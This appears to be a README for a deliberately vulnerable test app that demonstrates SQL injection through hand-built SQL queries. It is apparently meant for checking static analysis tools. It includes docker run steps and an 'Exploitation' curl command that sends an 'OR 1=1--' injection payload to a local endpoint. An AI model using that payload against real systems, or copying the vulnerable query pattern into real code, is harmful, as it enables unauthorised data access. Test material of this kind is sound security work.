 SAST Vulnerable Minimal Runnable Example(MRE)

## Background Information

This MRE portrays the realisitc but improper usage of manually constructed SQL statements using dynamic variables which then flow into SQL execution contexts 


### References

- [SQLite Cursor.execute](https://docs.python.org/3/library/sqlite3.html#sqlite3.Cursor.execute)
- [SQLalchemy Connection.execute](https://docs.sqlalchemy.org/en/20/core/connections.html#sqlalchemy.engine.Connection.execute).
- [SQLalchemy exec_driver_sql](https://docs.sqlalchemy.org/en/20/core/connections.html#sqlalchemy.engine.Connection.exec_driver_sql)
- [Advanced SQL injection cheatsheet](https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/tree/main) 

## Running

```bash
docker build . -t mre
```

```bash
docker run -p 127.0.0.1:5000:5000 mre
```

```
docker compose up --build
```

## Normal Execution

Example:
```bash
curl -X GET "http://localhost:5000/vulnerable01?param=john" 2>1|grep "<div class=\"user\">"|wc -l
```

## Exploitation 

```bash
curl -X GET 'http://localhost:5000/vulnerable01?param=any%27+OR+1%3D1--' 2>1|grep "<div class=\"user\">"|wc -l
```